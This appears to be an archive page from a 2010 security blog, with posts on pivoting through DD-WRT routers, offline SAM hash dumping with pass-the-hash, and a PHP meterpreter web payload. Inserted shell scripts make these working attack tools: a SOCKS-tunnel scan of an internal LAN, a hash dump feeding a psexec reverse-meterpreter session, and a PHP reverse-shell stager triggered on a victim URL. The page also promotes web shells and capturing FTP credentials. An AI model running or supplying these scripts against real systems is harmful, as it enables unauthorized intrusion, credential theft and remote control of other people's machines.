Archive for 2010

“DD-WRT, I Know Where You Live”

by on Dec.27, 2010, under Posts

http://www.devttys0.com/2010/12/dd-wrt-i-know-where-you-live/

I thought this was rather interesting due to the fact that I work with DD-WRT routers on a pretty regular basis.


An update: Just a bunch of random thoughts

by on Oct.15, 2010, under Uncategorized

Things I’ve taken note of over the past months:

1.) Finding ‘too much information’ (even when it’s public information) on a company can scare HR people, go figure.

2.) Linksys routers running DD-WRT (or similar third-party firmware) make great pivot points inside a network. If you are able to gain access to such a router and get SSH up and running on it, you have opened up a lot of opportunities.

One is scanning the internal network with nmap over an SSH tunnel via proxychains. Nikto can be run the same way against the web servers on the LAN behind the router.

You can also set up a second, private WLAN on the router to give yourself a degree of secure access to the network you are penetrating. DD-WRT really expands what a penetration tester can do.

3.) http://ipq.co rocks, ‘nough said. 🙂

4.) Being able to boot a live Linux distro on a victim machine, use bkhive and samdump2 to extract the password hashes (as in this tutorial: http://www.irongeek.com/i.php?page=security/localsamcrack2), and then do pass-the-hash attacks via Metasploit (as shown here: http://securitytube.net/Metasploit-Megaprimer-Part-16-(Pass-the-Hash-Attack)-video.aspx) is incredibly cool.

5.) The Nmap scripting engine rocks: http://securitytube.net/Mastering-the-Nmap-Scripting-Engine-(Blackhat-2010)-video.aspx

6.) Did you know you can install Nmap silently on a Windows machine? (Yes, it installs WinPcap as well.)
nmap-5.35DC1-setup.exe /S

7.) Other cool apps you can install silently on Windows machines using msiexec (msiexec /i appname.msi /q):
http://www.python.org/download/releases/2.5/
http://www.activestate.com/activeperl/downloads

8.) The concepts of SSH reverse connections and port forwarding make me elated: http://www.securitytube.net/Hacking-through-the-Windows-Firewall-using-Metasploit-video.aspx
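An added worked example for item 2 above (my own script, not from the original post or the DD-WRT project): open a SOCKS tunnel through the router's SSH and run nmap and nikto through it. It assumes the router is reachable at ROUTER on ROUTER_PORT with the login ROUTER_USER, that proxychains-ng (the proxychains4 binary) and nmap are installed on the attacking box, and that the LAN behind the router is TARGET_NET; the addresses are placeholders. The part the post glosses over is that a SOCKS proxy only carries whole TCP connections, so the nmap scan has to be a connect scan with host discovery and DNS turned off; a default SYN scan through proxychains simply reports nothing.

```shell
#!/bin/sh
# Added example: pivot through a DD-WRT router's SSH (dropbear) with a
# SOCKS proxy, then scan the LAN behind it via proxychains-ng.
# Assumptions (not from the original post): the router is reachable at
# $ROUTER:$ROUTER_PORT as $ROUTER_USER, proxychains4 and nmap are
# installed locally, and the LAN behind the router is $TARGET_NET.

ROUTER="${ROUTER:-192.0.2.1}"        # placeholder (RFC 5737 TEST-NET-1)
ROUTER_PORT="${ROUTER_PORT:-22}"
ROUTER_USER="${ROUTER_USER:-root}"   # DD-WRT's SSH login is root
SOCKS_PORT="${SOCKS_PORT:-1080}"
TARGET_NET="${TARGET_NET:-192.168.1.0/24}"

# Write a proxychains-ng config that sends everything through the local
# SOCKS port opened by ssh -D. proxy_dns keeps name lookups off our side
# of the wire; nmap gets -n anyway so it never resolves anything.
write_proxychains_conf() {
    pc_port="$1"; pc_file="$2"
    cat > "$pc_file" <<EOF
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 $pc_port
EOF
}

# Dynamic (SOCKS) forward: ssh -D asks dropbear for direct-tcpip channels,
# so every proxied TCP connection originates from the router's LAN side.
open_socks_tunnel() {
    ssh -f -N -p "$ROUTER_PORT" -D "127.0.0.1:$SOCKS_PORT" \
        "$ROUTER_USER@$ROUTER"
}

# SOCKS carries full TCP connections only, so the scan must be a connect
# scan (-sT) with no ICMP/ARP host discovery (-Pn) and no DNS (-n), and
# without UDP or OS detection. Down hosts cost a connect timeout each,
# so keep the port list short.
pivot_nmap() {
    proxychains4 -q -f "$1" nmap -sT -Pn -n \
        -p 22,80,443,445,3389 "$TARGET_NET" -oN pivot_scan.txt
}

# nikto is plain TCP too, so it needs nothing special beyond the proxy.
pivot_nikto() {
    proxychains4 -q -f "$1" nikto -h "$2"
}

case "${1:-}" in
    run)
        write_proxychains_conf "$SOCKS_PORT" ./pivot.conf
        open_socks_tunnel
        pivot_nmap ./pivot.conf
        ;;
    nikto)
        pivot_nikto ./pivot.conf "$2"    # e.g. http://192.168.1.10/
        ;;
esac
```

Run it with `sh pivot.sh run`; once the nmap output shows a web server, `sh pivot.sh nikto http://192.168.1.10/` reuses the same tunnel. The ssh process stays in the background (-f -N) until you kill it.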

More to come as usual…
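And an added example for item 4 (again my own script, not from the post or the linked tutorials): dump the SAM offline from the live-booted Linux, then turn one account's hash into a Metasploit psexec resource script for the pass-the-hash run. It assumes the Windows volume is mounted at WIN (read-only is fine) with the Vista/7 layout Windows/System32/config (adjust the case for XP's WINDOWS/system32), the 1.x bkhive and samdump2 that take a SYSTEM hive and a SAM hive respectively, that Metasploit is installed, and that RHOST/LHOST are placeholders for the target and for your listener.

```shell
#!/bin/sh
# Added example (not from the original post or the linked tutorials):
# dump the SAM offline from a live Linux boot, then build a psexec
# resource script for a pass-the-hash run against the same box.
# Assumptions: Windows volume mounted at $WIN, bkhive/samdump2 1.x and
# Metasploit installed, $RHOST is the target, $LHOST is our listener.

WIN="${WIN:-/mnt/win}"
RHOST="${RHOST:-192.0.2.10}"   # placeholder addresses (RFC 5737)
LHOST="${LHOST:-192.0.2.20}"

# bkhive pulls the SYSKEY boot key out of the SYSTEM hive; samdump2
# decrypts the SAM with it and prints pwdump-style lines:
#   user:rid:LMhash:NThash:::
dump_hashes() {
    bkhive "$WIN/Windows/System32/config/SYSTEM" ./bootkey
    samdump2 "$WIN/Windows/System32/config/SAM" ./bootkey > ./hashes.txt
}

# Print LM:NT for one user from a pwdump file, which is the form psexec's
# SMBPass expects. Returns 1 when the user is missing or the NT hash is
# that of the empty string: Windows refuses network logons with a blank
# password by default, so that account is not a useful PtH target.
hash_for_user() {
    hfu_user="$1"; hfu_file="$2"
    hfu_out=$(awk -F: -v u="$hfu_user" \
        '$1 == u && $4 != "31d6cfe0d16ae931b73c59d7e0c089c0" { print $3 ":" $4; exit }' \
        "$hfu_file")
    [ -n "$hfu_out" ] || return 1
    printf '%s\n' "$hfu_out"
}

# Resource script for msfconsole -r: psexec authenticates to ADMIN$ with
# the hash itself, so nothing has to be cracked first.
write_psexec_rc() {
    pr_user="$1"; pr_hash="$2"; pr_file="$3"
    cat > "$pr_file" <<EOF
use exploit/windows/smb/psexec
set RHOST $RHOST
set SMBUser $pr_user
set SMBPass $pr_hash
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $LHOST
exploit
EOF
}

case "${1:-}" in
    run)
        dump_hashes
        pth_hash=$(hash_for_user Administrator ./hashes.txt) \
            || { echo "no usable hash for Administrator" >&2; exit 1; }
        write_psexec_rc Administrator "$pth_hash" ./pth.rc
        msfconsole -r ./pth.rc
        ;;
esac
```

The offline dump only needs read access to the two hive files, so a read-only mount is enough and leaves no trace on the disk. The generated pth.rc is plain text; check the SMBPass line before running it, since a typo there just looks like a wrong password.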


Blackhat 2010 Videos

by on Aug.24, 2010, under Posts, Videos

If any of you out there on the internet regularly read my website, you may have noticed that I haven't updated in a while; this is because I've been busy with work and other aspects of life.

I still have projects in mind that I'm working on and would like to post, but I haven't made the time for them.

Without further ado, here are some links to videos from this year's premier security conference, Black Hat USA 2010 in Las Vegas:

http://www.securitytube.net/Wardriving-the-Smart-Grid-(Blackhat-2010)-video.aspx

http://www.securitytube.net/SCADA-and-ICS-for-Security-Experts-(Blackhat-2010)-video.aspx

http://www.securitytube.net/Offensive-Python-for-Web-Hackers-(Blackhat)-video.aspx

http://www.securitytube.net/Jackpotting-Automated-Teller-Machines-Redux-(Blackhat-2010)-video.aspx

http://media.blackhat.com/bh-us-10/video/Keynote2/BlackHat-USA-2010-Keynote-Hayden.m4v


Mutillidae/Samurai WTF/OWASP Top 10

by on Jul.13, 2010, under Posts, Videos

Mutillidae/Samurai WTF/OWASP Top 10 from Adrian Crenshaw on Vimeo.

http://www.irongeek.com/i.php?page=videos/mutillidae-samurai-wtf-owasp-10


PHP meterpreter payload

by on Jul.03, 2010, under Posts

Today I'll show a new feature that has just been added to the Metasploit Framework.

http://blog.metasploit.com/2010/06/meterpreter-for-pwned-home-pages.html

When you can upload files to a web directory and want further leverage on the system, doing it through PHP is the natural route. PHP shells are a viable solution to this problem, provided certain conditions are met.

One condition is that the server must allow system commands through PHP, that is, at least one of system, exec, shell_exec, passthru, popen or proc_open must not be listed in disable_functions. If the server permits that, a PHP shell is a great tool for further assessment and possible privilege escalation.

If you surf around on the internet looking for PHP shells, you’ll find ones such as: c99.php, DXshell.php. Honestly, check out: php-shell.org

Now, as part of the Metasploit Framework, pentesters can use meterpreter as a PHP payload. Here is a quick run-through of how to create a PHP meterpreter payload and how to execute it:

msfpayload php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 R > mypayload.php

Drop this file on the web server and it will connect back to you. Note that LHOST is 127.0.0.1 here, which only works when the web server and msfconsole run on the same box; against a real target set it to an address the web server can reach. Hopefully you have gained some sort of write access to the web root of the victim's site (for example by sniffing or capturing FTP credentials for it). Local or remote file inclusion are other ways of getting the code executed.

On the attacker's end, all you have to do is start msfconsole and use multi/handler. Issue the following commands:

msf > use multi/handler
msf > set PAYLOAD php/meterpreter/reverse_tcp
msf > set LHOST 127.0.0.1
msf > set LPORT 4444
msf > exploit -z -j

All the attacker needs to do now is visit http://victim.com/mypayload.php, and ideally a meterpreter session comes back on the handler.
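The same procedure as an added, scripted example (mine, not the post's commands and not part of Metasploit): generate the stager, start the handler from a resource script, and trigger the page without blocking on it. It assumes the 2010-era msfpayload and msfconsole are on the PATH, that LHOST is an address the web server can reach (a placeholder here), and that getting mypayload.php into the docroot (FTP, scp, an upload form, whatever write access you have) is done separately. Two details matter that the bare commands above don't show: the handler must be listening before the page is requested, because the stager connects out exactly once while the request is being served; and the HTTP request never finishes while the session is alive, since the PHP worker serving it is the meterpreter, so the trigger must not wait for a response.

```shell
#!/bin/sh
# Added example, not the post's own commands and not part of Metasploit:
# build the PHP meterpreter stager, start the handler from a resource
# script, and trigger the uploaded page. Assumptions: msfpayload and
# msfconsole on the PATH, $LHOST reachable from the *web server*, and the
# upload of mypayload.php into the docroot done by other means.

LHOST="${LHOST:-192.0.2.20}"   # placeholder (RFC 5737), set your own
LPORT="${LPORT:-4444}"
TARGET_URL="${TARGET_URL:-http://victim.example/mypayload.php}"

# R = raw output, i.e. the PHP source itself. The listener address is
# baked in, so regenerate the file whenever LHOST or LPORT change.
gen_payload() {
    msfpayload php/meterpreter/reverse_tcp LHOST="$LHOST" LPORT="$LPORT" R > "$1"
}

# Same handler the post sets up interactively. -j backgrounds it as a job
# and -z leaves the session un-interacted, so the console stays usable.
write_handler_rc() {
    hr_file="$1"
    cat > "$hr_file" <<EOF
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT $LPORT
exploit -z -j
EOF
}

# The stager connects back once, during the request, and the request does
# not complete while the session lives. --max-time bounds the wait; a
# curl timeout here is the expected, successful case, hence "|| true".
trigger_page() {
    curl -s -o /dev/null --max-time 5 "$1" || true
}

case "${1:-}" in
    payload) gen_payload ./mypayload.php ;;
    handler) write_handler_rc ./handler.rc; msfconsole -r ./handler.rc ;;
    trigger) trigger_page "$TARGET_URL" ;;   # from a second terminal
esac
```

Order of operations: `sh php_meterpreter.sh payload`, upload mypayload.php, `sh php_meterpreter.sh handler` in one terminal, then `sh php_meterpreter.sh trigger` in another; the session shows up in the first terminal under `sessions -l`.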

More to come as usual…
